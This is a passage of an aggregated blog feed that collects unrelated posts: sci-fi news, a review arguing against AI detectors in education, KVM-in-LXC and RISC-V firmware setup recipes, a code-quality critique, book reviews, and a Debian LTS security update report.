4. Robots! and animals

5. Cyborgs! And

6. Dome flying on the moon!... and a 7th with an open invite to any aliens or uplifted critters who wanna come on down and join in. Keep inviting till someone shows.


And no. SNUB the UFO guys! They are nasty bad-guests, if they exist. (And they likely don't.)



== Okay... this one impressed me... ==


Someone prompted an LLM to write a prologue and 1st chapters of an uplift novel in the style of David Brin. Have a look if you like. Interestingly, the intellectual content of the piece... its complexity and pertinence of ideas... is almost satisfactory, while the basic mechanics of style and fiction narrative are so lacking that I'd have to spend hours tutoring a young author in my Out of Time YA series, in order to get it close to my standards of basic craft. My universe? Perhaps. My style? Puh-lease.




 == More SciFi News ==


I truly am still writing sci fi... or at least helping others to do so.


My YA series Yanked -- or David Brin's Out of Time series* - has been re-released, with new additions, including Storm's Eye by October K. Santerelli, and The Archimedes Gambit by Patrick Freivald. Re-releases of the original three by Kress, Finch and Allen. 




And now three more! Boondoggle by Tom Easton and Torion Oey, Raising the Roof, by Richard Doyle, and Snowdance by SciFi legend Allen Steele and Robin Orm Hansen!


You'll love em all!


Finally... a reminder:  I'm posting my SF comedy The Ancient Ones, chapter by chapter. Samples were available on my website. Be ready for laughs + painful puns! And some sci fi concepts taken to um... extremes. Oh and there'll be freebies for best groaner comments to adjust the final version.



*The “Out of Time” (or “Yanked!”) series: Only teens can teleport through time and space! Dollops of fun, adventure & optimism for young adults.


Planet DebianGunnar Wolf: Heads we win, tails you lose — AI detectors in education

This post is an unpublished review for Heads we win, tails you lose — AI detectors in education

Educators throughout the world are tasked with the difficult requirement of evaluating students’ works, making sure the grades meaningfully reflect the students’ understanding of the subject, and that a graded assignment maps to the relevant work invested in solving it. After the irruption of Large-Language Models in late 2023, this task became obviously much harder: if a widely available computer program is able to solve an assignment in a way that resembles a human-generated response, how can educators meaningfully grade their groups?

As it has been the case with different innovations over time (such as with the appearance of electronic calculators or the mass availability of digital encyclopedias), the first reactions were of prohibition and denial: students who use the new tool in question are to be disqualified or somehow punished. It is only some time after the innovation in question settles that teachers find a way to properly weigh, integrate and accept its use.

The authors of this position article present several arguments as to why it is impossible, unethical and unadvisable to use automated AI detection systems to process student assignments. The first argument is whether it is at all possible to reliably differentiate human-written essays from LLM-generated artifacts. The first criticism is that AI detectors are, themselves, LLMs trained on human-generated texts (negative) and LLM-generated texts (positive). However, the only way to assert the training material is not noisy is to use pre-2020 text as human-generated — but natural ways of writing are influenced by what people read, and the authors quote studies pointing out that human language, particularly in the scholarly fields, has incorporated terms and constructions that were used as LLM markers. Quoting the authors, «As exposure to AI-generated material becomes increasingly widespread, it is reasonable to expect that the linguistic patterns of human writing will shift, reflecting the influence of AI-assisted texts encountered across education, media, and everyday communication». Stylistic elements and other such markers are being adopted back into regular speech at a high rate.

Then, the aspect of ethics comes into play as well. While teachers are expected to demand intellectual integrity from students, and plagiarism detectors have been widely accepted into the workflow of academics, the accusation of presenting LLM output as one's own work is necessarily an uphill battle: the accused party is tasked with providing proof of innocence against nebulous, probabilistic accusations. The authors argue that once a student is accused of turning in an LLM-generated text, the onus of proving innocence lies with the accused.

The authors review and argue against a series of techniques that have been presented in the literature to aid teachers in detecting LLM abuse, such as linguistic markers, single or multiple AI detectors, the use of false references, and hidden adversarial prompts, arguing that in all cases the techniques fail to be trustworthy enough and highlighting the probability of both false positives and false negatives. They also present AI detection as a false dichotomy: many submitted works are neither 100% human-generated nor 100% LLM-generated; rather, some pertinent LLM-generated paragraphs are mixed with human-generated content in a positive, critical use of AI (“Students’ work is frequently created with, not by, generative AI”).

The article closes by reiterating the authors’ position: “AI detection in education is not merely flawed; it is conceptually unsound”. They call upon institutions to accept that the use of generative LLMs cannot be “solved through surveillance and punishment”, but has to be tackled by an “assessment design that recognizes AI’s role in learning”.

This article’s position is very strong and well argued, and although it will surely meet with ample opposition, it addresses an important and very current problem. As a teacher, I found it a very enlightening read.

Cryptogram Medieval Encrypted Letter Decoded

Sent by a Spanish diplomat. Apparently people have been working on it since it was rediscovered in 1860.

Planet DebianMike Gabriel: KVM Support inside LXC Containers [updated]

Yesterday, I had to add support for running KVM virtual machines inside an LXC container. More as a reminder to myself, in case I ever have to do this again, here is the simple recipe:

LXC Container Config Adjustment

Enable lxc.autodev and add a hook script to be executed after the initial /dev creation (updated 20260428: lxc.cgroup2.* instead of lxc.cgroup.*):

[...]

# Auto-create /dev nodes and add native KVM support to the LXC container
lxc.autodev = 1
lxc.hook.autodev = /var/lib/lxc/.hooks/lxc-hook.kvm-support
lxc.cgroup2.devices.allow = c 10:232 rwm
lxc.cgroup2.devices.allow = c 10:238 rwm
lxc.cgroup2.devices.allow = c 10:241 rwm

[...]

[added 20260408] On the internet, you can find a recipe that simply bind-mounts /dev/kvm from the host into the LXC container. However, this fails if the group ID of the POSIX group kvm differs between host and container.
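
To check whether that applies to your setup, compare the group IDs (replace the container name with your own):

getent group kvm                                   # on the LXC host
lxc-attach -n mycontainer -- getent group kvm      # inside the container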

LXC Hook Script for KVM Support Enablement

I placed the following script at /var/lib/lxc/.hooks/lxc-hook.kvm-support (on the LXC host!):

#!/bin/sh

# set up native KVM support in LXC container
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/kvm c 10 232
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/kvm
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/vhost-net c 10 238
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/vhost-net
mknod -m 0660 ${LXC_ROOTFS_MOUNT}/dev/vhost-vsock c 10 241
chown :kvm ${LXC_ROOTFS_MOUNT}/dev/vhost-vsock
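
After restarting the container, the device nodes should show up inside it owned by group kvm; something along these lines should confirm it (again, replace the container name with your own):

lxc-stop -n mycontainer && lxc-start -n mycontainer
lxc-attach -n mycontainer -- ls -l /dev/kvm /dev/vhost-net /dev/vhost-vsock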

Worse Than FailureCodeSOD: The JSON Template

We rip on PHP a lot, but I am willing to admit that the language and ecosystem have evolved over the years. What started as an ugly templating language is now just an ugly regular language.

But what happens when you still really want to do things with templates? Allison has inherited a Python-based WSGI application which rejects any sort of formal routing or basic web development best practices. Their way of routing requests is simply long chains of "if condition then invokeA elif otherCondition then invokeB". Sometimes, those conditions will directly set the MIME type on the HTTP response.

They do use a templating library called Mako for generating their responses. They use it for their HTML responses, obviously. They also use it for their JSON responses, generating code like this:

{
    "success": true,
    "items": {
        %for item in items_available.keys():
        "${item}": ${items_available[item]}${',' if not loop.last else ''} 
        %endfor
        }   
}

The %for and matching %endfor mark the Python code off, which generates JSON via string-munging, complete with the check to make sure we're not on the last iteration of the loop.

Like so much bad code, this offers a degree of fractal wrongness. Instead of iterating over the keys and fetching the items inside the loop, you could iterate for key,value in items_available.items(), and according to the Mako docs, that for is just a regular Python for loop. That we're just outputting the contents of the dictionary is itself potentially a problem: sure, if we know the types of the dictionary, we'll know that whatever it is can be output in the body of a JSON document, but do we really think this code is using type annotations? I don't. And for a RESTful web service, I'm always going to feel weird about using a success field when ideally the HTTP status code could convey most of that information (and yes, I know there are reasons to still put status in the body, I just hate it).
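
For illustration, that intermediate improvement would look something like this. It is still string-munging JSON, so it is still not the right fix:

{
    "success": true,
    "items": {
        %for key, value in items_available.items():
        "${key}": ${value}${',' if not loop.last else ''}
        %endfor
    }
}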

Of course, the real issue is just this: Python's built-in JSON serialization is actually pretty advanced. And performant! You don't need any of this; you could just do something like:

return json.dumps({"success": True, "items": items_available})

No templates. No formatting. No worries about how the data gets represented. Well, still some worries, because the JSON serializer will throw exceptions if it doesn't know what to do with a type. But then at least you get that exception on the server side and aren't sending the client a malformed document.
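
If unknown types are a concern, json.dumps also accepts a fallback serializer; default=str is a blunt but common choice:

return json.dumps({"success": True, "items": items_available}, default=str)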

In any case, this is a good demonstration that you can write bad PHP in any language.

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

365 TomorrowsBack For You

Author: Julian Miles, Staff Writer The evening sky is barely lit by the last ghost of sunset when Fern answers a knock at the door, pistol in the free hand behind her back. The world tilts as she recognises the figure standing there. Willing herself not to pass out, she says the first thing that […]

The post Back For You appeared first on 365tomorrows.

Planet DebianSahil Dhiman: Weekly Notes

Weekly notes is a genre where people chronicle their week on their blogs. Weekly notes are like a window. I love going through these, as they’re a steady stream of week-on-week happenings and progress in people’s lives. They show people making efforts to improve: from basic things like learning to swim or drive, to planning long-term goals such as vacations, or moving house, state, or even country. In some cases, they carry internal monologues, thoughts, and anxieties. They are a constant nudge for me to work on myself, like their authors do.

These are the weekly notes I read nowadays:

Most of them are on Thejesh’s weekly notes planet, which auto-updates when new posts arrive. Posts usually start appearing on Friday evenings, and by Monday almost everyone has posted.

It reminds me of a word from The Dictionary of Obscure Sorrows - Kenaway:

the longing to see how other people live their lives when they’re not in public; wishing you could tune in to the raw feed of another human existence, in all its messiness and solitude—shimmying in place while brushing their teeth, squabbling over where to put the shoes, talking out their problems on solitary commutes—if only to give you something to compare your own life against, and figure out whether you’re bizarrely normal or normally bizarre.

Close enough.

Planet DebianRuss Allbery: Review: What We Are Seeking

Review: What We Are Seeking, by Cameron Reed

Publisher: Tor
Copyright: 2026
ISBN: 1-250-36474-4
Format: Kindle
Pages: 339

What We Are Seeking is a bit hard to classify beyond science fiction. I think I would call it anthropological science fiction, but it's also a first contact story and a planetary colony story. It is a standalone novel (well, so far as I know; see later in the review for caveats). This is Cameron Reed's second novel after the excellent and memorable cyberpunk novel The Fortunate Fall, first published in 1996 under Reed's former name of Raphael Carter.

John Maraintha is a doctor from the world of Essius. He took what he thought was a temporary job on the Free Ship Edgar's Folly, where he's endured considerable culture shock. As the novel opens, John learns that the colonists on Scythia have requested a translator to talk to one of the native life forms, and a doctor since they're down to only one. John will be that doctor. The captain has decided, and by the rules of the free ships, John does not get a choice in the matter.

The Scythian colony is about four hundred people, now located in a desert climate since the complex native life forms destroyed their previous settlement. The colonists are a split between Ischnurans and Zandaheans, two other human civilizations from the scatter of colony worlds left after Earth embraced AIs (aiyis here) and turned inward. Both of those groups marry, something John considers a moral abomination. Neither of them seem likely to understand Essian sexual ethics. More devastatingly, John had intended to spend some time as a ship doctor and then return home to a new place in Essian society. Once he lands on Scythia, the chances of that are gone; it is highly unlikely any ship would pick him up again and take him home.

I have been trying to find the right books to compare What We Are Seeking with ever since I read it. The best I've come up with are Ursula K. Le Guin (particularly The Dispossessed), Eleanor Arnason's A Woman of the Iron People, and Becky Chambers's To Be Taught, If Fortunate. The start of the book felt like an intentional revisiting of an earlier era of science fiction, with somewhat updated science and politics, but the last half of the book, where the action picks up considerably, is a meditation on gender, social systems, religion, and small-group politics. All of that is mixed with biological exploration and a first-contact story with some quite-alien aliens.

This is the sort of novel where the protagonist's culture is as foreign to the reader as any of the other cultures he encounters, so the reader is assembling several jigsaw puzzles at once. John is dropped into an established colony with its own social norms and established hierarchies. The one other outsider, the translator Sudharma Jain, is, as his name implies, a Jain who keeps very strict religious observances. Half of the colony is from something akin to a fundamentalist Christian religious sect that practices patriarchy and strict marriage codes. The other half is more gently sexist (but still sexist) and has its own tradition of a third gender that becomes central to the story. John, meanwhile, is a strong believer in the Essian approach to social organization: Any two partners of any gender freely have sex by mutual consent and without obligation, and family is based solely on blood relations. These beliefs do not fit comfortably together, even when people are trying (as they mostly do) to be welcoming.

The first half of this book is very slow. This gives all of the characters space to breathe and become comfortable, and the characterization is superb, but it is a book to start when you're in the mood for something slow and observational. There is a plot that gradually becomes apparent, or rather there are several plots that are intertwined, but tension and urgency are mostly reserved for the second half of the book. Instead, the book opens with a lot of close observation of alien flora and fauna and the untangling of subtle social dynamics among the Scythians.

There is also a visitor from earth, much to the distress of the Scythians. Earth presence means the ships will not return and the colony may be cut off from any sort of technological resupply. Despite speaking a common language, that visitor is as mutually alien to the other groups as they are to the native flora. Her life is fully integrated with aiyis, giving her essentially godlike powers and the ability to turn off inconvenient emotions and disregard anything she doesn't want to see. What she and the Earth aiyis are doing on the planet is one of the early mysteries.

The dialogue in this book is truly excellent. Each character has their own voice, there are fascinating digressions on different words that lead to tidbits of world-building, and some of the culture-specific idioms are delightful.

"I'm making a mess of this. None of that matters. Let me fall out the window and come in the door again. This is how my story ought to start:"

The challenges for the characters in this story are slow but deep ones: belonging and self-definition, the conflict between cultural tradition and personal circumstance, and the sacrifices required to live with small groups in situations where civil war is viscerally attractive. It has one of the most comprehensive and fascinating treatments of transgender issues that I've read in science fiction. Its commentary on current politics is subtle and estranged in the way that science fiction does best, but still pointed and satisfying. And, well, there are passages like this that I absolutely adore:

"I wouldn't go that far. It could be they are right, the universe we see exists because a mind like ours created it — at least, a mind enough like ours that we can say it wants one thing and not another, and when it acts it does so with intent. That's as good an idea as any. But it is certainly not plausible that such a being believes that people everywhere should marry, or that men should never visit men, or no one should become a jess. Look at what they have created. The universe could have been nothing at all, or one atom of hydrogen floating in a void, or a diamond crystal infinite in all directions, if their mind cared for simplicity or tidiness. Instead we have stars and planets and black holes and nebulas. It could have all been cold and dead, but there is life. They could have made one species for each world, or just a few, which could have stayed the same forever, but instead we have millions and millions, all of which are changing every moment, varying among themselves and boiling off in all directions. Such a god is like an artist who fills up a library of sketchbooks with their drawings of strange creatures, and when every scrap of paper in the place is used up, goes back with a different color ink and scribbles over them again. They are obsessed with variation — they gorge themselves with it and never grow full. Do you really think a mind like that could want us all to live in the same way?"

I had one problem with this book, though, and for me it was a big one: There is no ending. Reed effectively builds tension, gets me caring about all of the characters, sets up several problems, starts down a path towards resolution, and then the book just... ends.

Long-time readers of my reviews will know that I'm a denouement fanatic. I want the scouring of the shire, I want the chapter set in the happily ever after, I want the catharsis of an ending. This made me so grumpy!

To be clear, this is not sequel bait (at least so far as I can tell). I can write a philosophical defense of the ending. The types of problems and lives that Reed set up don't have clear endings; this is, to some extent, the point. We muddle through, and then those who come after us muddle through some more, and the cumulative effect is called human civilization. And there is some denouement; Reed doesn't leave the reader at a cliffhanger or anything that egregious.

But still, I wanted the happy ending, even though that was unrealistic for the style of story this is, because I'm a happy ending reader. This is not an ending sort of book; it's the sort of book where I get a sinking feeling at the 95% mark because there aren't enough pages left for the number of remaining unresolved problems. I've gotten less annoyed in the days since I finished the book, and I can appreciate the thematic point made by how the book ends, but I still feel like it's worth an advance warning if you're a reader like I am.

I would be delighted by a sequel, but it didn't feel like that was the intent.

Apart from that, this was both excellent and rather unlike a lot of current science fiction. I think the closest comparison I can make among recent novels I've read is Sue Burke's Semiosis. What We Are Seeking has a similar sort of world-building, but I liked these characters so much more. It felt like a classic literary science fiction novel, but very much written in 2026. Highly recommended, just beware of the lack of closure.

Content notes: Sexism, homophobia, stomach illness, and some religious abuse.

Rating: 8 out of 10

,

Planet DebianDirk Eddelbuettel: RProtoBuf 0.4.27 on CRAN: Upstream Adjustment

A new maintenance release 0.4.27 of RProtoBuf arrived on CRAN today. RProtoBuf provides R with bindings for the Google Protocol Buffers (“ProtoBuf”) data encoding and serialization library used and released by Google, and deployed very widely in numerous projects as a language and operating-system agnostic protocol. The new release is also already available as a binary via r2u.

This release adjusts to a change upstream. Luca Billi noticed that upstream removed some fields from FieldDescriptor, filed an issue, and followed up with a spotless PR. No other changes.

The following section from the NEWS.Rd file has all details and links.

Changes in RProtoBuf version 0.4.27 (2026-04-26)

  • Adjust to FieldDescriptor API changes in ProtoBuf 3.4 (Luca Billi in #114 fixing #113)

Thanks to my CRANberries, there is a diff to the previous release. The RProtoBuf page has copies of the (older) package vignette, the ‘quick’ overview vignette, and the pre-print of our JSS paper. Questions, comments etc should go to the GitHub issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianAurelien Jarno: Running upstream OpenSBI on SpacemiT K1

The SpacemiT K1 is a rather interesting RISC-V SoC, found for instance on boards like the Banana Pi BPI-F3 board. It's one of those platforms that looked promising on paper, but took a bit of time before things really started to move upstream. Things have clearly accelerated over the last few months.

Linux 7.0 brings, among other things, PCIe support, making the board quite capable as a development board. SD card, CPU thermal sensor, and cpufreq support are already in the pipe.

Unfortunately the situation is less advanced on the firmware side. There is only very basic support for the SpacemiT K1 in U-Boot for the second stage, and initial SPL support has been posted on the mailing list, but has not yet been merged. In practice, this means you still have to rely on the vendor U-Boot, which is based on the rather old 2022.10 release.

On the other hand, OpenSBI does have upstream support for the SpacemiT K1, however it is not compatible with the vendor U-Boot, mostly due to device tree differences.

This can be addressed by applying a few patches to the vendor U-Boot, which I have published in a git tree in the k1-bl-v2.2.y-opensbi branch (technically this can also be handled on the OpenSBI side, but I prefer using a vanilla upstream OpenSBI version). The first two patches update the configuration to get closer to the upstream U-Boot defaults, and to enable some configuration options for the Milk-V Jupiter board, which stores its firmware in SPI NOR flash, instead of eMMC for the Banana Pi BPI-F3. The following patches update the device tree by adding extra compatible entries to several devices, as expected by the upstream kernel and OpenSBI (thanks to Troy Mitchell for the hint about the UART change) and update the CPU riscv,isa properties. Finally an additional patch adds the SpacemiT P1 PMIC to the device tree, which is required for the OpenSBI reboot patchset I recently posted (this is currently done only for the Banana Pi BPI-F3 and Milk-V Jupiter boards, but extending it to other boards should be straightforward).

Building this U-Boot version is as simple as running this command in the source directory:

make k1_defconfig && make

On a Banana Pi BPI-F3 board, the resulting U-Boot can be flashed with:

echo 0 > /sys/block/mmcblk0boot0/force_ro
dd if=FSBL.bin of=/dev/mmcblk0boot0 bs=512 seek=1
dd if=u-boot.itb of=/dev/mmcblk0p1

Building upstream OpenSBI is also fairly simple, and can be done by running this command in the source directory:

make PLATFORM=generic

On a Banana Pi BPI-F3 board, the resulting OpenSBI can be flashed with:

dd if=fw_dynamic.itb of=/dev/mmcblk0p2

Note that the vendor U-Boot version is patched to install OpenSBI in a separate partition instead of embedding it, as the upstream U-Boot does. While this works well on the Banana Pi BPI-F3, the corresponding partition in the Milk-V Jupiter SPI NOR flash is too small for the upstream OpenSBI version, and can't be easily resized without breaking compatibility. To address this, the branch k1-bl-v2.2.y-opensbi-embedded contains an additional patch (a bit hackish, I admit) to somehow restore the upstream approach. The build process remains simple: first build OpenSBI with the following command:

make PLATFORM=generic

Then build U-Boot, specifying the path to the just-built OpenSBI firmware:

make k1_defconfig && make OPENSBI=/path/to/opensbi/build/platform/generic/firmware/fw_dynamic.bin

On a Milk-V Jupiter board, the resulting combined U-Boot/OpenSBI can be flashed with:

modprobe mtdblock
dd bs=4k if=FSBL.bin of=/dev/mtdblock2
dd bs=4k if=u-boot.itb of=/dev/mtdblock5

This combined U-Boot/OpenSBI can also be used on a Banana Pi BPI-F3, using the same flashing procedure as above, while skipping the OpenSBI part (although running it won't cause any issue, it will simply be unused).

All of this is admittedly a bit hackish, but enabling the use of upstream OpenSBI is already one step forward. Hopefully, in a few months, we will be able to rely entirely on upstream U-Boot.

365 TomorrowsThe Crow That Teases My Dog

Author: David C.Nutt The Crow sat on the post croaking, clicking and cawing at my dog Culley. Culley’s got a real strong prey drive so watching him sit there and occasionally whine and stutter step was par for the course. Jah, Culley-boy has serious focus. If he scents a squirrel or chases a rabbit in […]

The post The Crow That Teases My Dog appeared first on 365tomorrows.

,

Rondam RamblingsSeeking God in Science part 6: Systems and States

In the previous two installments we talked about chairs, specifically, what distinguishes a chair from a non-chair.  We considered and rejected the "chairness hypothesis" in favor of the atomic theory, which says that chairs — and all physical objects (at least inanimate ones) — are made of atoms.  (N.B. I am actually a human, notwithstanding my fondness for em-dashes.)  What makes

365 TomorrowsTranquility > DENIED

Author: James Gonda The walls in the room curve inward like the inside of a shell, smooth and pale. When he thinks of sitting a chair rises from the floor and shapes itself to his back. Light fills the space evenly. His thoughts arrange themselves without effort. He feels panic build and begins counting breaths […]

The post Tranquility > DENIED appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: The Genocidal Healer

Review: The Genocidal Healer, by James White

Series: Sector General #8
Publisher: Orb
Copyright: 1991
Printing: May 2003
ISBN: 0-7653-0663-8
Format: Trade paperback
Pages: 255

The Genocidal Healer is the eighth book in James White's medical science fiction series about the Sector General hospital. As with the rest of the series, detailed memory of the previous books is not required and the books could be read out of order if you didn't mind spoilers.

I read this as part of the Orb General Practice omnibus.

Surgeon-Captain Lioren is a Tarlan doctor who was in charge of the medical response to a newly-discovered civilization. The aliens were suffering from an apparently universal plague and an ongoing vicious war waged entirely through hand-to-hand combat, putting them on the edge of extinction. Lioren rushed the distribution of a possible cure against the advice of the doctors working on developing it, with catastrophic results. As The Genocidal Healer opens, Lioren is insisting on a court-martial in the hope of receiving the sentence it believes it deserves and was denied: death.

(It pronouns are the convention in the Sector General series for all alien races and formal discussions, because even someone prone to bouts of gender essentialism such as White understood the need for avoiding gender assumptions in a science fiction medical context.)

Predictably, both Sector General and the Monitor Corps that technically runs the hospital are flatly unwilling to execute Lioren. Instead, he is assigned as a new apprentice in the psychology department under the legendary O'Mara, where he is ordered to investigate the psychological fitness of a senior doctor named Seldal. This leads him to talk to Seldal's patients, which in turn leads to a challenging set of ethical dilemmas.

The first five chapters (and more than sixty pages) are the story of Lioren's trial and a recounting of the events on Cromsag. The series is full of medical and cultural puzzles like this, and usually I like them, but I thought this one was less successful. We know the vague (and horrible) outline of the ending in advance, and the massive simplification and artificial universality that is required to make this puzzle work is particularly blatant. A universally infectious disease is more of a fiction plot than a believable biological concept, and the number of failures of communication, analysis, and misunderstanding that have to line up to create White's predetermined outcome were a bit much for me.

Once the story gets past that and into Lioren's psychological work, the novel improves. Lioren is guilt-ridden and irrational, but also rather arrogant about his guilt and his concepts of professional responsibility in a way that I think mostly worked. Most of the novel consists of Lioren slowly discovering that people like him and enjoy talking to him, much to his bafflement. In that, it has the gentle kindness and sense of universal basic decency that is characteristic of this series. There are, of course, medical puzzles to solve, although this time they are primarily psychological in nature. Various characters from previous books make an appearance, but White re-explains their background in sufficient detail that you don't need to remember (or have read) those previous books.

There are a lot of similarities between this book and the previous one, Code Blue—Emergency. Both feature nonhuman viewpoint protagonists and amusing descriptions of human facial expressions from an alien perspective. Both feature protagonists with overly rigid ethical structures that partly clash with the generally human policies of Sector General. The Genocidal Healer is a bit more subtle and nuanced, although a lot of Lioren's psychological evaluation rests on an ethical difference that I found somewhat unbelievable. This book, though, tackles a subject the previous book did not: religion. The treatment isn't horrible, but I have some complaints.

My primary issue is that Lioren, who starts as an atheist, does extensive research into religion to help a patient and then starts making statements summarizing the religious beliefs of the majority of known species that are just... Christianity. As someone raised Christian, I recognized it immediately as the sort of abstracted Christianity that Christians claim is universal while completely ignoring the opinions of the adherents of any other religion.

Key components of this majority galactic religious pattern, according to Lioren, include an omnipotent and omnibenevolent creator god, a religious figure who preaches forgiveness and mercy and is persecuted, and emphasis on redemption. This simply is not some abstract universal religion. This is just Christianity in disguise. Even in religions that have some of those elements in their traditions, they do not get the same emphasis and are not handled the way that Lioren describes them. I therefore found Lioren's extended discussions of religion rather annoying, since he kept claiming as relatively universal principles beliefs that are not even held by the majority of religious adherents on Earth, let alone a wildly varying collection of alien races with entirely different biology and societal constructions. It caused a lot of problems for my suspension of disbelief, on top of the annoyance at this repetition of, frankly, Christian propaganda.

Lioren goes, from that research, into theodicy (the problem of evil). The interesting part of this is White's earnest portrayal of a doctor's approach to societal problems: a desire to find workarounds and patches and fixes for anything that makes people unhappy, whether medical or social. It makes sense, given the horrible biologic hands that some of the aliens in this series have been dealt, that they would question the idea of a benevolent god, so this philosophical digression is justified in that sense. But you might guess that a mid-list science fiction author is not going to say something new about one of the oldest problems in Christianity, and indeed he does not. Lioren arrives at the standard handwaving about the unknowability of divine intent, which I found tedious to read but at least not fatal to the plot.

White, thankfully, doesn't take the religious material too far. The characters recognize how sensitive of an issue religion is in a hospital, Lioren never adopts religion fully, and the resolution of the plot is as much biological as philosophical. White is going somewhere with the introduction of religion, and although some of the path there annoyed me, I think the destination worked. White was from Northern Ireland, and therefore well aware of the drawbacks of religion, and he abhorred violence (hence Sector General as a setting), so the reader is in better hands with him than with most authors who might attempt this plot.

I think I know a bit too much about religion to be the best audience for this entry in the series, and I'm not sure the introductory five chapters quite worked. But as with all of the other books in the series, this kept me turning the pages and I'm glad I read it. The Genocidal Healer probably isn't worth seeking out unless you're reading the whole series, but if you're enjoying the rest of the series, you'll probably like this too.

Followed by The Galactic Gourmet.

Rating: 6 out of 10

,

Cryptogram Friday Squid Blogging: How Squid Survived Extinction Events

Science news:

Scientists have finally cracked a long-standing mystery about squid and cuttlefish evolution by analyzing newly sequenced genomes alongside global datasets. The research reveals that these bizarre, intelligent creatures likely originated deep in the ocean over 100 million years ago, surviving mass extinction events by retreating into oxygen-rich deep-sea refuges. For millions of years, their evolution barely changed—until a dramatic post-extinction boom sparked rapid diversification as they moved into new shallow-water habitats.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Cryptogram FBI Extracts Deleted Signal Messages from iPhone Notification Database

404 Media reports (alternate site):

The FBI was able to forensically extract copies of incoming Signal messages from a defendant’s iPhone, even after the app was deleted, because copies of the content were saved in the device’s push notification database….

The news shows how forensic extraction—when someone has physical access to a device and is able to run specialized software on it—can yield sensitive data derived from secure messaging apps in unexpected places. Signal already has a setting that blocks message content from displaying in push notifications; the case highlights why such a feature might be important for some users to turn on.

“We learned that specifically on iPhones, if one’s settings in the Signal app allow for message notifications and previews to show up on the lock screen, [then] the iPhone will internally store those notifications/message previews in the internal memory of the device,” a supporter of the defendants who was taking notes during the trial told 404 Media.

EDITED TO ADD (4/24): Apple has patched this vulnerability.

Cryptogram Hiding Bluetooth Trackers in Mail

It was used to track a Dutch naval ship:

Dutch journalist Just Vervaart, working for regional media network Omroep Gelderland, followed the directions posted on the Dutch government website and mailed a postcard with a hidden tracker inside. Because of this, they were able to track the ship for about a day, watching it sail from Heraklion, Crete, before it turned towards Cyprus. While it only showed the location of that one vessel, knowing that it was part of a carrier strike group sailing in the Mediterranean could potentially put the entire fleet at risk.

[…]

Navy officials reported that the tracker was discovered within 24 hours of the ship’s arrival, during mail sorting, and was eventually disabled. Because of this incident, the Dutch authorities now ban electronic greeting cards, which, unlike packages, weren’t x-rayed before being brought on the ship.

365 TomorrowsFieldwork

Author: Eva C. Stein Kaela had misread the trail map. She expected thorns and sunbaked clay; instead she stepped from the composite walkway into a grove. She wore a field harness of sterilised vials and a hand lens that layered spectral readouts over her vision. She was thinking about leaf venation – dicot xylem bundles […]

The post Fieldwork appeared first on 365tomorrows.

Worse Than FailureError'd: April Showers

"RFC 1738 (and 3986) disagree" and so does Daniel D. "Reddit API has some weird app creation going on with lots of recently migrated and undocumented stuff. But having redirect URL set to localhost (or 127.0.0.1) usually works. Well, if you don't disagree with Sir Tim Berners-Lee about what URL is. Which Reddit does. hostnumber = digits "." digits "." digits "." digits". I'd file this one with all the websites that try to perform validation on email addresses, and get it wrong.


"Why aren't we getting any resumes?" wondered Fred G. "This is a snippet from a job posting. I'm sure it worked perfectly when HR tested it."


"Service required..." was Chris H.'s title for this gem. "My 2022 Chevrolet has been at the dealer for recall service for two weeks now, "waiting for parts". That doesn't stop GM from emailing every few days with a reminder that the car needs the recall service, and inviting me to schedule it at a dealer (that isn't actually a dealer) located a convenient 2500 mile drive from my home (about 200 times the distance to the dealer where the car currently sits), and providing a non-existent placeholder phone number to contact them at to schedule the recall service."


"How to subtly tell your customers that you don't wish to be contacted" explains Yuri. "The bank's staff must be wondering why no one wants to talk to them...Is it their suit's brand that is throwing everyone off? Can they blame it on COVID?"


"Bad money formatting by tax software" Adam R. complained. "I'm ashamed to admit it, but yes, I did pay Intuit money to file my taxes. This should really be a free service provided by the government, but, y'know, *lobbying*. You'd think that a business focused on tax preparation software would know how to properly format currency values, but in this case they failed to set the proper number of decimal points."


[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Planet DebianFreexian Collaborators: Monthly report about Debian Long Term Support, March 2026 (by Santiago Ruano Rincón)

The Debian LTS Team, funded by Freexian’s Debian LTS offering (https://www.freexian.com/lts/debian/), is pleased to report its activities for March.

Activity summary

During the month of March, 20 contributors have been paid to work on Debian LTS (links to individual contributor reports are located below).

The team released 24 DLAs fixing 250 CVEs.

We also welcomed two new members to the team, Lukas Märdian and Emmanuel Arias, who actually started contributing to the LTS project several months ago.

The team continued preparing security updates in its usual rhythm. Beyond the updates targeting Debian 11 (“bullseye”), which is the current release under LTS, the team also proposed updates for more recent releases (Debian 12 (“bookworm”) and Debian 13 (“trixie”)), including Debian unstable. We highlight several notable security updates below.

  • ansible (DLA 4502-1), prepared by Lee Garret in collaboration with Jochen, fixing a vulnerability that allows attackers to bypass unsafe content protections
  • asterisk (DLA 4515-1), prepared by Lukas Märdian, fixing four CVEs that include possible privilege escalations.
  • gimp (DLA 4500-1), prepared by Thorsten, fixing four CVEs related to denial of service or execution of arbitrary code.
  • gst-plugins-base1.0 and gst-plugins-ugly1.0 (DLA-4514-1, DLA-4516-1, respectively), both prepared by Utkarsh, addressing vulnerabilities that may lead to arbitrary code execution.
  • imagemagick, released by Bastien Roucariès (DLA 4497-1) fixing multiple vulnerabilities that could lead to information leaks, bypass of security policies, denial of service or arbitrary code execution.
  • libpng1.6 (DLA 4521-1), prepared by Tobias Frost, fixing an arbitrary code execution vulnerability
  • linux: Ben Hutchings released DLA 4498-1 and DLA 4499-1 for linux 5.10 and linux 6.1, respectively. Those updates especially address the “CrackArmor” flaw.
  • ruby-rack (DLA 4505-1), prepared by Utkarsh Gupta, addressing two vulnerabilities
  • strongswan (DLA 4512-1), prepared by Thorsten Alteholz, fixing a Denial of Service vulnerability
  • roundcube (DLA 4517-1) prepared by Guilhem Moulin, who discovered that one of the fixes provided by upstream was incomplete.

Contributions from outside the LTS Team:

